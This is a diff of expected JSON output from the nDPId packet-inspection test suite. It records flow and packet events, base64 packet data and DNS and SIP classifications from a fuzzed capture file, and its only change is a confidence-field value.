00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":575,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470891857,"flow_last_seen":1120470891857,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470891857,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":19192,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":575,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":1,"flow_last_seen":1120470891857,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470891857,"pkt":"ADBUADRWAODtAW69CABFAABIa1YAAIARS3zAqAECwKgBAUr4ADUAND6u6x4BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":575,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470891857,"flow_last_seen":1120470891857,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470891857,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":19192,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":575,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470891857,"flow_last_seen":1120470891857,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470891857,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":19192,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":576,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470899859,"flow_last_seen":1120470899859,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470899859,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2809,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":576,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":1,"flow_last_seen":1120470899859,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470899859,"pkt":"ADBUADRWAODtAW69CABFAABEVdYAAIARS3\/AqAECwKgBAQr5ADUAMKjFfAAAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} 
-00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":576,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470899859,"flow_last_seen":1120470899859,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470899859,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2809,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":576,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470899859,"flow_last_seen":1120470899859,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470899859,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2809,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":577,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":2,"flow_last_seen":1120470899861,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470899861,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CvkAR4tBfACAAAABAgEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} -00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":577,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470899859,"flow_last_seen":1120470899861,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470899861,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2809,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":577,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470899859,"flow_last_seen":1120470899861,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470899861,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2809,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":578,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470899862,"flow_last_seen":1120470899862,"flow_idle_time":200000,"flow_min_l4_payload_len":1076,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":1076,"flow_avg_l4_payload_len":1076,"midstream":0,"thread_ts_msec":1120470899862,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":17860,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":578,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":1,"flow_last_seen":1120470899862,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1118,"pkt_l4_len":1084,"thread_ts_msec":1120470899862,"pkt":"ADBUADRWAODtAW6\/CABFAARQa9cAAIAREwbAqAEC1PIhIxPERcQEPH6wSU5WSVRFIHNpeDowMDk3MjM5Mjg3MDQ0QHNpcC5jeWJlcmNpdHkuZGsgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjticmFuY2g9ek\/oRzRiS25wMjAyMzgyNzWqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq
qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":579,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470899865,"flow_last_seen":1120470899865,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470899865,"l3_proto":"ip4","src_ip":"192.170.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":579,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":1,"flow_last_seen":1120470899865,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470899865,"pkt":"ADBUADRWAODtAW69CABFAABIa9gAAIARS3nAqgECwKgBAQr6ADUANDnJ8AEBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrd0YhAAE="} 
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":579,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470899865,"flow_last_seen":1120470899865,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470899865,"l3_proto":"ip4","src_ip":"192.170.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":579,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470899865,"flow_last_seen":1120470899865,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470899865,"l3_proto":"ip4","src_ip":"192.170.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":583,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470900860,"flow_last_seen":1120470900860,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470900860,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":583,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":1,"flow_last_seen":1120470900860,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470900860,"pkt":"ADBUADRWAODtAW69CABFAABIa9oAAIARS3fAqAECwKgBAQr6ADUANDnU8AEBAAABAAAAAAAABF9zaXAEX3VkcQNzaXAJTXliZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":583,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470900860,"flow_last_seen":1120470900860,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470900860,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udq.sip.mybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":583,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470900860,"flow_last_seen":1120470900860,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470900860,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udq.sip.mybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":584,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":2,"flow_last_seen":1120470902863,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470902863,"pkt":"ADBUADRWAODtAW69CABFAABIa9sAAIARS3bAqAECwKgBAQr6ADUANDnJ8AEBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAheQE="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":584,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470900860,"flow_last_seen":1120470902863,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470902863,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":584,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470900860,"flow_last_seen":1120470902863,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470902863,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":3,"flow_last_seen":1120470904866,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470904866,"pkt":"ADBUADRWAODtAW69CABFAABIa9wAAIARS3XAqAECwKgBAQr6ADUANDnJ8AEBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJTnliZXJjaXR5AmRrAAAhAAE="} 
-00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":587,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470900860,"flow_last_seen":1120470904866,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470904866,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.nybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":587,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470900860,"flow_last_seen":1120470904866,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470904866,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.nybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":588,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470908872,"flow_last_seen":1120470908872,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470908872,"l3_proto":"ip4","src_ip":"128.168.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":588,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":1,"flow_last_seen":1120470908872,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470908872,"pkt":"ADBUADRWAODtAW69CABFAABIa90AAIARS3SAqAECwKgBAQr6ADUANDnJ8AEBAIgBAAAAABAABF9zaXAEX3VkcANzaXAJY3liZXNjaXR5AmRrAAAhAAE="} 00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":589,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470301328,"flow_last_seen":1120470301328,"flow_idle_time":620000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1120470908872,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","l4_proto":127,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":589,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470301328,"flow_last_seen":1120470301328,"flow_idle_time":620000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1120470908872,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","l4_proto":127,"flow_datalink":1,"flow_max_packets":3} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":589,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470717078,"flow_last_seen":1120470717080,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":848,"flow_avg_l4_payload_len":424,"midstream":0,"thread_ts_msec":1120470908872,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":589,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470717078,"flow_last_seen":1120470717080,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":848,"flow_avg_l4_payload_len":424,"midstream":0,"thread_ts_msec":1120470908872,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} 
00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":589,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470721915,"flow_last_seen":1120470721915,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120470908872,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":138,"dst_port":394,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00598{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":589,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470721915,"flow_last_seen":1120470721915,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120470908872,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":138,"dst_port":394,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":589,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470916873,"flow_last_seen":1120470916873,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470916873,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2811,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
